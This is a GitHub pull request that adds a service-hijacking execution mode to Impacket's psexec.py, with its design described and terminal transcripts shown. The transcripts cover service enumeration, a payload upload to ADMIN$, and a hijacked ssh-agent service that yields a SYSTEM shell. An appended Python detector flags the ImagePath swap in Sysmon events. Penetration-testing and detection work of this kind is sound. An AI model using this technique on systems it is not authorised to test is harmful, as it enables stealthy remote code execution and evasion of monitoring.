@wackymaker wackymaker commented Sep 16, 2025

Pull Request: Add servicechange Execution Mode to psexec.py

This pull request introduces a new execution mode, servicechange, to Impacket's psexec.py, inspired by service hijacking techniques studied during my OSEP training. Unlike the standard PSEXEC execution, which creates a new service for command execution, servicechange leverages existing services on the target machine to achieve command execution, improving stealth and operational flexibility.

Key changes

New module: impacket/examples/servicechange.py

  • Fully modeled after the existing serviceinstall module, following its architecture and workflow.
  • Implements a complete service hijacking lifecycle:
    1. Service enumeration: Identifies services suitable for hijacking, considering permissions, startup type, and criticality.
    2. Analysis: Checks service configuration, dependencies, and existing binary path to ensure hijack safety.
    3. Backup: Saves original service configuration and binary path to allow restoration.
    4. Hijack: Temporarily replaces the service executable path with the payload.
    5. Execution: Starts the service to run the payload under the service context.
    6. Restore: Reverts the service configuration and binary path to avoid leaving traces.
  • Supports additional options for stealth, such as service start type adjustment and delayed restoration.

Enhancements to psexec.py

  • listServices() — Enumerates all available services and prioritizes those suitable for hijacking.
  • executeViaServiceHijacking() — Implements the end-to-end hijacking workflow: backup → replace → execute → restore.
  • Integrates seamlessly with existing psexec credential handling, Kerberos authentication, SMB sessions, and error handling.

Purpose and Benefits

  • Stealthy command execution: By hijacking existing services instead of creating new ones, it reduces detection by security monitoring tools.
  • Persistence and operational flexibility: Service hijacking can be used to execute commands under privileged service accounts with minimal footprint.
  • Fully tested: Validated in a controlled lab environment to ensure safe and reliable execution.

Use

You can use service list to output the service binary paths that the current machine allows you to change.

┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker'@192.168.174.154 -service-list
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Listing services on 192.168.174.154
[*] Listing all services on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service 1394ohci
[*] Querying service 3ware
[*] Querying service ACPI
.............
[*] Querying service cbdhsvc_ac2c1
[*] Querying service CDPUserSvc_ac2c1
[*] Querying service ConsentUxUserSvc_ac2c1
[*] Querying service CredentialEnrollmentManagerUserSvc_ac2c1
[-] Error getting service info for CredentialEnrollmentManagerUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Querying service DeviceAssociationBrokerSvc_ac2c1
[-] Error getting service info for DeviceAssociationBrokerSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Querying service DevicePickerUserSvc_ac2c1
[*] Querying service DevicesFlowUserSvc_ac2c1
[*] Querying service PimIndexMaintenanceSvc_ac2c1
[*] Querying service PrintWorkflowUserSvc_ac2c1
[-] Error getting service info for PrintWorkflowUserSvc_ac2c1: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Querying service UdkUserSvc_ac2c1
[*] Querying service UnistoreSvc_ac2c1
[*] Querying service UserDataSvc_ac2c1
[*] Querying service WpnUserService_ac2c1
[*] Suitable for hijacking: 22

========================================================================================================================
SUITABLE SERVICES FOR HIJACKING - 192.168.174.154
========================================================================================================================
SERVICE NAME                   START TYPE      STATUS          ACCOUNT         PRIORITY            
------------------------------------------------------------------------------------------------------------------------
AppVClient                    DISABLED        STOPPED         LocalSystem    1                   
SensorDataService             DISABLED        STOPPED         LocalSystem    1                   
ssh-agent                     DISABLED        STOPPED         LocalSystem    1                   
UevAgentService               DISABLED        STOPPED         LocalSystem    1                   
WSearch                       DISABLED        STOPPED         LocalSystem    1                   
diagnosticshub.standardcollect MANUAL          STOPPED         LocalSystem    2                   
msiserver                     MANUAL          STOPPED         LocalSystem    2                   
NtFrs                         MANUAL          STOPPED         LocalSystem    2                   
RpcLocator                    MANUAL          STOPPED         LocalSystem    2                   
SecurityHealthService         MANUAL          STOPPED         LocalSystem    2                   
SgrmBroker                    MANUAL          STOPPED         LocalSystem    2                   
TieringEngineService          MANUAL          STOPPED         localSystem    2                   
vmvss                         MANUAL          STOPPED         LocalSystem    2                   
wmiApSrv                      MANUAL          STOPPED         localSystem    2                   
ALG                           MANUAL          STOPPED         NT AUTHORITY\Lo 3                   
SNMPTRAP                      MANUAL          STOPPED         NT AUTHORITY\Lo 3                   
NetTcpPortSharing             MANUAL          STOPPED         LocalSystem    4                   
PerfHost                      MANUAL          STOPPED         NT AUTHORITY\Lo 4                   
RSoPProv                      MANUAL          STOPPED         LocalSystem    4                   
edgeupdatem                   MANUAL          STOPPED         LocalSystem    13                  
MicrosoftEdgeElevationService MANUAL          STOPPED         LocalSystem    13                  
WMPNetworkSvc                 MANUAL          STOPPED         NT AUTHORITY\Ne 14                  
========================================================================================================================
Total suitable services: 22
========================================================================================================================

Afterwards, when we use service change, we enter the hijacking branch and no longer create services, but instead change the existing service's binary path.

┌──(wackymaker㉿kali)-[~/test]
└─$ python3 psexec2.py test.com/administrator:'wackymaker'@192.168.174.154 -service-change ssh-agent
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Executing command via service hijacking: cmd.exe
[*] Using specified service: ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Selected service for hijacking: ssh-agent
[*] Preparing service hijacking...
[*] Checking if service needs restoration to original state...
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service appears to be hijacked, attempting to restore original configuration...
[*] Restoring original service configuration for ssh-agent...
[*] Stopping service ssh-agent before restoration...
[*] Opening SVCManager on 192.168.174.154.....
[*] Opening SVCManager on 192.168.174.154.....
[*] Restoring service configuration...
[*]   - Binary Path: 
[*]   - Start Type: 3
[*]   - Start Name: LocalSystem
[*] Service configuration restored successfully
[*] Service restored to default configuration
[*] Backing up configuration for service ssh-agent
[*] Opening SVCManager on 192.168.174.154.....
[*] Querying service ssh-agent
[*] Service backup completed:
[*]   - Binary Path: C:\Windows\System32\OpenSSH\ssh-agent.exe
[*]   - Start Type: 3
[*]   - Start Name: LocalSystem
[*] Using default RemComSvc executable
[*] Requesting shares on 192.168.174.154.....
[*] Found writable share ADMIN$
[*] Uploading file <impacket.examples.remcomsvc.RemComSvc object at 0x7f72a3f616d0> to System32\dVCRvXEW.exe
[*] File uploaded successfully
[*] Hijacking service ssh-agent with payload: C:\Windows\System32\dVCRvXEW.exe
[*] Opening SVCManager on 192.168.174.154.....
[*] Service configuration modified successfully
[*] Starting service to execute payload...
[*] Service hijacked successfully, now executing command...
[*] Executing command through hijacked service...
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [�汾 10.0.20348.169]

[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
(c) Microsoft Corporation����������Ȩ����


C:\Windows\system32>chcp65001
Active code page: 65001

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32> 

When exiting normally, service recovery is carried out to ensure that the environment is left in its normal state.

C:\Windows\system32>exit
[*] Process cmd.exe finished with ErrorCode: 0, ReturnCode: 0
[*] Stopping hijacked service after command execution...
[*] Opening SVCManager on 192.168.174.154.....
[*] Service ssh-agent stopped successfully

This hijacking path is compatible with all existing parameters of PSEXEC, including -file, -c, -path, etc.
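From the detection side, the hijack → start → restore sequence shown above leaves a characteristic trace: the service's ImagePath registry value is set to a new executable and then set back to its original value a few seconds later. The following is an added example (not part of this PR or of Impacket) that looks for exactly that pattern in Sysmon Event ID 13 (registry value set) records; the field names follow Sysmon's registry event schema, and the records themselves are constructed to mirror the ssh-agent transcript.

```python
import re
from datetime import datetime, timedelta

# Constructed Sysmon Event ID 13 records (not real telemetry), modelled on the
# transcript: ssh-agent's ImagePath is swapped to a random System32 executable
# and restored 8 seconds later; Spooler shows a single, unrelated change.
EVENTS = [
    {"UtcTime": "2025-09-16 10:00:01", "EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\ssh-agent\ImagePath",
     "Details": r"C:\Windows\System32\dVCRvXEW.exe"},
    {"UtcTime": "2025-09-16 10:00:09", "EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\ssh-agent\ImagePath",
     "Details": r"C:\Windows\System32\OpenSSH\ssh-agent.exe"},
    {"UtcTime": "2025-09-16 11:30:00", "EventID": 13,
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\Spooler\ImagePath",
     "Details": r"C:\Windows\System32\spoolsv.exe"},
]

IMAGEPATH_RE = re.compile(r"\\Services\\(?P<svc>[^\\]+)\\ImagePath$", re.IGNORECASE)
# Eight random letters plus .exe, like the dVCRvXEW.exe dropped into System32 above.
RANDOM_EXE_RE = re.compile(r"^[A-Za-z]{8}\.exe$")


def find_imagepath_swaps(events, window=timedelta(minutes=10)):
    """Return one alert per service whose ImagePath was changed twice within
    `window`: a transient binary path followed by a restore."""
    by_service = {}
    for ev in events:
        m = IMAGEPATH_RE.search(ev.get("TargetObject", ""))
        if ev.get("EventID") != 13 or not m:
            continue
        ts = datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S")
        by_service.setdefault(m.group("svc").lower(), []).append((ts, ev["Details"]))

    alerts = []
    for svc, changes in by_service.items():
        changes.sort()  # chronological order per service
        for (t1, transient), (t2, restored) in zip(changes, changes[1:]):
            if transient != restored and t2 - t1 <= window:
                exe = transient.rsplit("\\", 1)[-1]
                alerts.append({"service": svc, "transient_path": transient,
                               "restored_to": restored,
                               "seconds_live": int((t2 - t1).total_seconds()),
                               "random_name": bool(RANDOM_EXE_RE.match(exe))})
    return alerts


if __name__ == "__main__":
    for alert in find_imagepath_swaps(EVENTS):
        print(alert)
```

A single ImagePath change on a service that is never reverted would not be caught by this pairing logic and deserves its own lower-severity rule; the two-change window is tuned to the restore step this PR performs on exit.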

@anadrianmanrique anadrianmanrique added the medium Medium priority item label Sep 18, 2025